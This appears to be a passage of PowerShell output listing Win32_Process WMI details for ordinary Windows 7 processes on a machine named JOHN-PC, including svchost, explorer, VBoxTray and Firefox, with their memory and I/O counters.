\\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"1240\"\nCaption : svchost.exe\nCommandLine : C:\\Windows\\system32\\svchost.exe -k NetworkService\nCreationClassName : Win32_Process\nCreationDate : 20170712122330.991419-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : svchost.exe\nExecutablePath : C:\\Windows\\system32\\svchost.exe\nExecutionState :\nHandle : 1240\nHandleCount : 594\nInstallDate :\nKernelModeTime : 6809792\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : svchost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 53068\nOtherTransferCount : 2086541\nPageFaults : 9584\nPageFileUsage : 11972\nParentProcessId : 488\nPeakPageFileUsage : 12872\nPeakVirtualSize : 84770816\nPeakWorkingSetSize : 11320\nPriority : 8\nPrivatePageCount : 12259328\nProcessId : 1240\nQuotaNonPagedPoolUsage : 20\nQuotaPagedPoolUsage : 74\nQuotaPeakNonPagedPoolUsage : 25\nQuotaPeakPagedPoolUsage : 75\nReadOperationCount : 284\nReadTransferCount : 739919\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 24\nUserModeTime : 2103024\nVirtualSize : 79527936\nWindowsVersion : 6.1.7600\nWorkingSetSize : 10477568\nWriteOperationCount : 541\nWriteTransferCount : 1281099\nPSComputerName : JOHN-PC\nProcessName : svchost.exe\nHandles : 594\nVM : 79527936\nWS : 10477568\nPath : C:\\Windows\\system32\\svchost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1332\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"1332\"\nCaption : spoolsv.exe\nCommandLine : C:\\Windows\\System32\\spoolsv.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712122331.205295-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : spoolsv.exe\nExecutablePath : C:\\Windows\\System32\\spoolsv.exe\nExecutionState :\nHandle : 1332\nHandleCount : 280\nInstallDate :\nKernelModeTime : 400576\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : spoolsv.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 782\nOtherTransferCount : 11299\nPageFaults : 2916\nPageFileUsage : 4324\nParentProcessId : 488\nPeakPageFileUsage : 4564\nPeakVirtualSize : 61775872\nPeakWorkingSetSize : 8532\nPriority : 8\nPrivatePageCount : 4427776\nProcessId : 1332\nQuotaNonPagedPoolUsage : 10\nQuotaPagedPoolUsage : 56\nQuotaPeakNonPagedPoolUsage : 10\nQuotaPeakPagedPoolUsage : 56\nReadOperationCount : 4\nReadTransferCount : 1225\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 12\nUserModeTime : 100144\nVirtualSize : 60256256\nWindowsVersion : 6.1.7600\nWorkingSetSize : 5652480\nWriteOperationCount : 2\nWriteTransferCount : 232\nPSComputerName : JOHN-PC\nProcessName : spoolsv.exe\nHandles : 280\nVM : 60256256\nWS : 5652480\nPath : C:\\Windows\\System32\\spoolsv.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1368\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"1368\"\nCaption : svchost.exe\nCommandLine : C:\\Windows\\system32\\svchost.exe -k LocalServiceNoNetwork\nCreationClassName : Win32_Process\nCreationDate : 20170712122331.351993-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : svchost.exe\nExecutablePath : C:\\Windows\\system32\\svchost.exe\nExecutionState :\nHandle : 1368\nHandleCount : 308\nInstallDate :\nKernelModeTime : 3004320\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : svchost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 69575\nOtherTransferCount : 1630938\nPageFaults : 19463\nPageFileUsage : 8512\nParentProcessId : 488\nPeakPageFileUsage : 28608\nPeakVirtualSize : 65683456\nPeakWorkingSetSize : 26852\nPriority : 8\nPrivatePageCount : 8716288\nProcessId : 1368\nQuotaNonPagedPoolUsage : 25\nQuotaPagedPoolUsage : 36\nQuotaPeakNonPagedPoolUsage : 27\nQuotaPeakPagedPoolUsage : 40\nReadOperationCount : 509\nReadTransferCount : 43006740\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 18\nUserModeTime : 5307632\nVirtualSize : 47792128\nWindowsVersion : 6.1.7600\nWorkingSetSize : 7675904\nWriteOperationCount : 10\nWriteTransferCount : 424892\nPSComputerName : JOHN-PC\nProcessName : svchost.exe\nHandles : 308\nVM : 47792128\nWS : 7675904\nPath : C:\\Windows\\system32\\svchost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1504\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"1504\"\nCaption : svchost.exe\nCommandLine : C:\\Windows\\system32\\svchost.exe -k LocalServiceAndNoImpersonation\nCreationClassName : Win32_Process\nCreationDate : 20170712122331.467871-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : svchost.exe\nExecutablePath : C:\\Windows\\system32\\svchost.exe\nExecutionState :\nHandle : 1504\nHandleCount : 303\nInstallDate :\nKernelModeTime : 2904176\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : svchost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 55150\nOtherTransferCount : 1627911\nPageFaults : 5999\nPageFileUsage : 4296\nParentProcessId : 488\nPeakPageFileUsage : 4932\nPeakVirtualSize : 70107136\nPeakWorkingSetSize : 8540\nPriority : 8\nPrivatePageCount : 4399104\nProcessId : 1504\nQuotaNonPagedPoolUsage : 15\nQuotaPagedPoolUsage : 61\nQuotaPeakNonPagedPoolUsage : 25\nQuotaPeakPagedPoolUsage : 62\nReadOperationCount : 1\nReadTransferCount : 92\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 20\nUserModeTime : 2303312\nVirtualSize : 66961408\nWindowsVersion : 6.1.7600\nWorkingSetSize : 6828032\nWriteOperationCount : 1\nWriteTransferCount : 116\nPSComputerName : JOHN-PC\nProcessName : svchost.exe\nHandles : 303\nVM : 66961408\nWS : 6828032\nPath : C:\\Windows\\system32\\svchost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1896\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"1896\"\nCaption : svchost.exe\nCommandLine : C:\\Windows\\system32\\svchost.exe -k NetworkServiceNetworkRestricted\nCreationClassName : Win32_Process\nCreationDate : 20170712122332.174175-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : svchost.exe\nExecutablePath : C:\\Windows\\system32\\svchost.exe\nExecutionState :\nHandle : 1896\nHandleCount : 94\nInstallDate :\nKernelModeTime : 701008\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : svchost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 4399\nOtherTransferCount : 97894\nPageFaults : 1276\nPageFileUsage : 1104\nParentProcessId : 488\nPeakPageFileUsage : 1132\nPeakVirtualSize : 26558464\nPeakWorkingSetSize : 3892\nPriority : 8\nPrivatePageCount : 1130496\nProcessId : 1896\nQuotaNonPagedPoolUsage : 7\nQuotaPagedPoolUsage : 30\nQuotaPeakNonPagedPoolUsage : 9\nQuotaPeakPagedPoolUsage : 30\nReadOperationCount : 0\nReadTransferCount : 0\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 5\nUserModeTime : 600864\nVirtualSize : 26292224\nWindowsVersion : 6.1.7600\nWorkingSetSize : 3489792\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : JOHN-PC\nProcessName : svchost.exe\nHandles : 94\nVM : 26292224\nWS : 3489792\nPath : C:\\Windows\\system32\\svchost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1668\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"1668\"\nCaption : svchost.exe\nCommandLine : C:\\Windows\\System32\\svchost.exe -k secsvcs\nCreationClassName : Win32_Process\nCreationDate : 20170712122344.727197-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : svchost.exe\nExecutablePath : C:\\Windows\\System32\\svchost.exe\nExecutionState :\nHandle : 1668\nHandleCount : 359\nInstallDate :\nKernelModeTime : 14621024\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : svchost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 12927\nOtherTransferCount : 444738\nPageFaults : 166121\nPageFileUsage : 145148\nParentProcessId : 488\nPeakPageFileUsage : 245408\nPeakVirtualSize : 317341696\nPeakWorkingSetSize : 243872\nPriority : 8\nPrivatePageCount : 148631552\nProcessId : 1668\nQuotaNonPagedPoolUsage : 36\nQuotaPagedPoolUsage : 64\nQuotaPeakNonPagedPoolUsage : 41\nQuotaPeakPagedPoolUsage : 75\nReadOperationCount : 917\nReadTransferCount : 46138771\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 13\nUserModeTime : 47968976\nVirtualSize : 219480064\nWindowsVersion : 6.1.7600\nWorkingSetSize : 8355840\nWriteOperationCount : 214\nWriteTransferCount : 6614\nPSComputerName : JOHN-PC\nProcessName : svchost.exe\nHandles : 359\nVM : 219480064\nWS : 8355840\nPath : C:\\Windows\\System32\\svchost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1192\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"1192\"\nCaption : SearchIndexer.exe\nCommandLine : C:\\Windows\\system32\\SearchIndexer.exe /Embedding\nCreationClassName : Win32_Process\nCreationDate : 20170712122548.509448-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : SearchIndexer.exe\nExecutablePath : C:\\Windows\\system32\\SearchIndexer.exe\nExecutionState :\nHandle : 1192\nHandleCount : 667\nInstallDate :\nKernelModeTime : 4606624\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : SearchIndexer.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 52920\nOtherTransferCount : 4811782\nPageFaults : 9205\nPageFileUsage : 15412\nParentProcessId : 488\nPeakPageFileUsage : 16316\nPeakVirtualSize : 113541120\nPeakWorkingSetSize : 12264\nPriority : 8\nPrivatePageCount : 15781888\nProcessId : 1192\nQuotaNonPagedPoolUsage : 17\nQuotaPagedPoolUsage : 71\nQuotaPeakNonPagedPoolUsage : 22\nQuotaPeakPagedPoolUsage : 96\nReadOperationCount : 609\nReadTransferCount : 6666438\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 11\nUserModeTime : 7310512\nVirtualSize : 87171072\nWindowsVersion : 6.1.7600\nWorkingSetSize : 7647232\nWriteOperationCount : 210\nWriteTransferCount : 962228\nPSComputerName : JOHN-PC\nProcessName : SearchIndexer.exe\nHandles : 667\nVM : 87171072\nWS : 7647232\nPath : C:\\Windows\\system32\\SearchIndexer.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1264\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"1264\"\nCaption : dwm.exe\nCommandLine : \"C:\\Windows\\system32\\Dwm.exe\"\nCreationClassName : Win32_Process\nCreationDate : 20170712123339.426000-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : dwm.exe\nExecutablePath : C:\\Windows\\system32\\Dwm.exe\nExecutionState :\nHandle : 1264\nHandleCount : 66\nInstallDate :\nKernelModeTime : 0\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : dwm.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 226\nOtherTransferCount : 786\nPageFaults : 993\nPageFileUsage : 872\nParentProcessId : 900\nPeakPageFileUsage : 1036\nPeakVirtualSize : 42967040\nPeakWorkingSetSize : 3464\nPriority : 8\nPrivatePageCount : 892928\nProcessId : 1264\nQuotaNonPagedPoolUsage : 4\nQuotaPagedPoolUsage : 40\nQuotaPeakNonPagedPoolUsage : 4\nQuotaPeakPagedPoolUsage : 44\nReadOperationCount : 1\nReadTransferCount : 15398\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 3\nUserModeTime : 200288\nVirtualSize : 40202240\nWindowsVersion : 6.1.7600\nWorkingSetSize : 3006464\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : JOHN-PC\nProcessName : dwm.exe\nHandles : 66\nVM : 40202240\nWS : 3006464\nPath : C:\\Windows\\system32\\Dwm.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"980\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"980\"\nCaption : explorer.exe\nCommandLine : C:\\Windows\\Explorer.EXE\nCreationClassName : Win32_Process\nCreationDate : 20170712123339.446028-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : explorer.exe\nExecutablePath : C:\\Windows\\Explorer.EXE\nExecutionState :\nHandle : 980\nHandleCount : 671\nInstallDate :\nKernelModeTime : 9513680\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : explorer.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 10039\nOtherTransferCount : 899546\nPageFaults : 16650\nPageFileUsage : 17808\nParentProcessId : 144\nPeakPageFileUsage : 18464\nPeakVirtualSize : 197206016\nPeakWorkingSetSize : 27632\nPriority : 8\nPrivatePageCount : 18235392\nProcessId : 980\nQuotaNonPagedPoolUsage : 22\nQuotaPagedPoolUsage : 189\nQuotaPeakNonPagedPoolUsage : 27\nQuotaPeakPagedPoolUsage : 195\nReadOperationCount : 880\nReadTransferCount : 2500972\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 20\nUserModeTime : 4306192\nVirtualSize : 195244032\nWindowsVersion : 6.1.7600\nWorkingSetSize : 27623424\nWriteOperationCount : 7\nWriteTransferCount : 1622\nPSComputerName : JOHN-PC\nProcessName : explorer.exe\nHandles : 671\nVM : 195244032\nWS : 27623424\nPath : C:\\Windows\\Explorer.EXE\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1344\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"1344\"\nCaption : taskhost.exe\nCommandLine : \"taskhost.exe\"\nCreationClassName : Win32_Process\nCreationDate : 20170712123339.466057-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : taskhost.exe\nExecutablePath : C:\\Windows\\system32\\taskhost.exe\nExecutionState :\nHandle : 1344\nHandleCount : 141\nInstallDate :\nKernelModeTime : 200288\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : taskhost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 297\nOtherTransferCount : 692\nPageFaults : 1863\nPageFileUsage : 2024\nParentProcessId : 488\nPeakPageFileUsage : 2120\nPeakVirtualSize : 44015616\nPeakWorkingSetSize : 4780\nPriority : 8\nPrivatePageCount : 2072576\nProcessId : 1344\nQuotaNonPagedPoolUsage : 9\nQuotaPagedPoolUsage : 45\nQuotaPeakNonPagedPoolUsage : 9\nQuotaPeakPagedPoolUsage : 46\nReadOperationCount : 3\nReadTransferCount : 62250\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 8\nUserModeTime : 200288\nVirtualSize : 41598976\nWindowsVersion : 6.1.7600\nWorkingSetSize : 4276224\nWriteOperationCount : 2\nWriteTransferCount : 142\nPSComputerName : JOHN-PC\nProcessName : taskhost.exe\nHandles : 141\nVM : 41598976\nWS : 4276224\nPath : C:\\Windows\\system32\\taskhost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"2056\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"2056\"\nCaption : VBoxTray.exe\nCommandLine : \"C:\\Windows\\System32\\VBoxTray.exe\"\nCreationClassName : Win32_Process\nCreationDate : 20170712123340.046892-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : VBoxTray.exe\nExecutablePath : C:\\Windows\\System32\\VBoxTray.exe\nExecutionState :\nHandle : 2056\nHandleCount : 136\nInstallDate :\nKernelModeTime : 1502160\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : VBoxTray.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 52845\nOtherTransferCount : 349038\nPageFaults : 13153\nPageFileUsage : 1244\nParentProcessId : 980\nPeakPageFileUsage : 1280\nPeakVirtualSize : 65552384\nPeakWorkingSetSize : 4516\nPriority : 8\nPrivatePageCount : 1273856\nProcessId : 2056\nQuotaNonPagedPoolUsage : 6\nQuotaPagedPoolUsage : 53\nQuotaPeakNonPagedPoolUsage : 6\nQuotaPeakPagedPoolUsage : 54\nReadOperationCount : 8095\nReadTransferCount : 81006\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 11\nUserModeTime : 300432\nVirtualSize : 61358080\nWindowsVersion : 6.1.7600\nWorkingSetSize : 3899392\nWriteOperationCount : 4047\nWriteTransferCount : 16188\nPSComputerName : JOHN-PC\nProcessName : VBoxTray.exe\nHandles : 136\nVM : 61358080\nWS : 3899392\nPath : C:\\Windows\\System32\\VBoxTray.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"2244\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"2244\"\nCaption : firefox.exe\nCommandLine : \"C:\\Program Files\\Mozilla Firefox\\firefox.exe\"\nCreationClassName : Win32_Process\nCreationDate : 20170712123342.971132-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : firefox.exe\nExecutablePath : C:\\Program Files\\Mozilla Firefox\\firefox.exe\nExecutionState :\nHandle : 2244\nHandleCount : 622\nInstallDate :\nKernelModeTime : 103649040\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : firefox.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 67866\nOtherTransferCount : 1039678\nPageFaults : 381767\nPageFileUsage : 122084\nParentProcessId : 980\nPeakPageFileUsage : 148096\nPeakVirtualSize : 604745728\nPeakWorkingSetSize : 155248\nPriority : 8\nPrivatePageCount : 125014016\nProcessId : 2244\nQuotaNonPagedPoolUsage : 28\nQuotaPagedPoolUsage : 200\nQuotaPeakNonPagedPoolUsage : 158\nQuotaPeakPagedPoolUsage : 203\nReadOperationCount : 7689\nReadTransferCount : 411068937\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 45\nUserModeTime : 438530576\nVirtualSize : 579633152\nWindowsVersion : 6.1.7600\nWorkingSetSize : 135786496\nWriteOperationCount : 941843\nWriteTransferCount : 176029996\nPSComputerName : JOHN-PC\nProcessName : firefox.exe\nHandles : 622\nVM : 579633152\nWS : 135786496\nPath : C:\\Program Files\\Mozilla Firefox\\firefox.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"2480\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"2480\"\nCaption : firefox.exe\nCommandLine : \"C:\\Program Files\\Mozilla Firefox\\firefox.exe\" -contentproc --channel=\"2244.0.548555581\\175440830\" -childID 1 -isForBrowser -intPrefs 5:50|6:-1|28:1000|33:20|34:10|43:128|44\n :10000|48:0|50:400|51:1|52:0|53:0|58:0|59:120|60:120|133:2|134:1|147:5000|157:0|159:0|170:10000|182:-1|187:128|188:10000|189:0|195:24|196:32768|198:0|199:0|207:5|211:1048576\n |212:100|213:5000|215:600|217:1|226:1|231:0|241:60000| -boolPrefs 1:0|2:0|4:0|26:1|27:1|30:0|35:1|36:0|37:0|38:0|39:1|40:0|41:1|42:1|45:0|46:0|47:0|49:0|54:1|55:1|56:0|57:1|\n 61:1|62:1|63:0|64:1|65:1|66:0|67:1|70:0|71:0|74:1|75:1|79:1|80:1|81:0|82:0|84:0|85:0|86:1|87:0|90:0|91:1|92:1|93:1|94:1|95:1|96:0|97:0|98:1|99:0|100:0|101:0|102:1|103:1|104:\n 0|105:1|106:1|107:0|108:0|109:1|110:1|111:1|112:0|113:1|114:1|115:1|116:1|117:1|118:1|119:1|120:1|122:0|123:0|124:0|125:1|126:0|127:1|131:1|132:1|135:1|136:0|141:0|146:0|149\n :1|152:1|154:1|158:0|161:1|164:1|165:1|171:0|172:0|173:1|175:0|181:0|183:1|184:0|185:0|186:0|193:0|194:0|197:1|200:0|202:0|204:1|205:0|210:0|214:1|219:0|220:0|221:0|222:1|22\n 4:1|225:1|228:0|233:0|234:0|235:1|236:1|237:0|238:1|239:1|240:0|242:0|243:0|245:0|253:1|254:1|255:0|256:0|257:0| -stringPrefs \"3:7;release|174:3;1.0|191:332; ¼½¾!???:?????%?\n ??????? ???????-’·?????????‹›?/???????????????/:?????????????????? ???????????????????./???????|192:8;moderate|227:38;{1a7261b9-5e44-4ce3-bde9-ad3e4a859d9a}|\"\n -greomni \"C:\\Program Files\\Mozilla Firefox\\omni.ja\" -appomni \"C:\\Program Files\\Mozilla Firefox\\browser\\omni.ja\" -appdir \"C:\\Program Files\\Mozilla Firefox\\browser\" 2244\n \"\\\\.\\pipe\\gecko-crash-server-pipe.2244\" tab\nCreationClassName : Win32_Process\nCreationDate : 20170712123344.804771-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : firefox.exe\nExecutablePath : C:\\Program Files\\Mozilla Firefox\\firefox.exe\nExecutionState :\nHandle : 2480\nHandleCount : 291\nInstallDate :\nKernelModeTime : 10214688\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : firefox.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 2838\nOtherTransferCount : 21324\nPageFaults : 26002\nPageFileUsage : 30428\nParentProcessId : 2244\nPeakPageFileUsage : 36828\nPeakVirtualSize : 374845440\nPeakWorkingSetSize : 61540\nPriority : 8\nPrivatePageCount : 31158272\nProcessId : 2480\nQuotaNonPagedPoolUsage : 16\nQuotaPagedPoolUsage : 152\nQuotaPeakNonPagedPoolUsage : 21\nQuotaPeakPagedPoolUsage : 159\nReadOperationCount : 6709\nReadTransferCount : 59186239\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 20\nUserModeTime : 7110224\nVirtualSize : 361779200\nWindowsVersion : 6.1.7600\nWorkingSetSize : 42983424\nWriteOperationCount : 4326\nWriteTransferCount : 576704\nPSComputerName : JOHN-PC\nProcessName : firefox.exe\nHandles : 291\nVM : 361779200\nWS : 42983424\nPath : C:\\Program Files\\Mozilla Firefox\\firefox.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"2844\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"2844\"\nCaption : wmpnetwk.exe\nCommandLine : \"C:\\Program Files\\Windows Media Player\\wmpnetwk.exe\"\nCreationClassName : Win32_Process\nCreationDate : 20170712123348.174625-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : wmpnetwk.exe\nExecutablePath : C:\\Program Files\\Windows Media Player\\wmpnetwk.exe\nExecutionState :\nHandle : 2844\nHandleCount : 220\nInstallDate :\nKernelModeTime : 901296\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : wmpnetwk.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 3426\nOtherTransferCount : 106030\nPageFaults : 13164\nPageFileUsage : 3292\nParentProcessId : 488\nPeakPageFileUsage : 3732\nPeakVirtualSize : 84627456\nPeakWorkingSetSize : 8672\nPriority : 8\nPrivatePageCount : 3371008\nProcessId : 2844\nQuotaNonPagedPoolUsage : 8\nQuotaPagedPoolUsage : 81\nQuotaPeakNonPagedPoolUsage : 9\nQuotaPeakPagedPoolUsage : 86\nReadOperationCount : 710\nReadTransferCount : 147842\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 9\nUserModeTime : 2002880\nVirtualSize : 78745600\nWindowsVersion : 6.1.7600\nWorkingSetSize : 3600384\nWriteOperationCount : 8\nWriteTransferCount : 544\nPSComputerName : JOHN-PC\nProcessName : wmpnetwk.exe\nHandles : 220\nVM : 78745600\nWS : 3600384\nPath : C:\\Program Files\\Windows Media Player\\wmpnetwk.exe\n\n__GENUS : 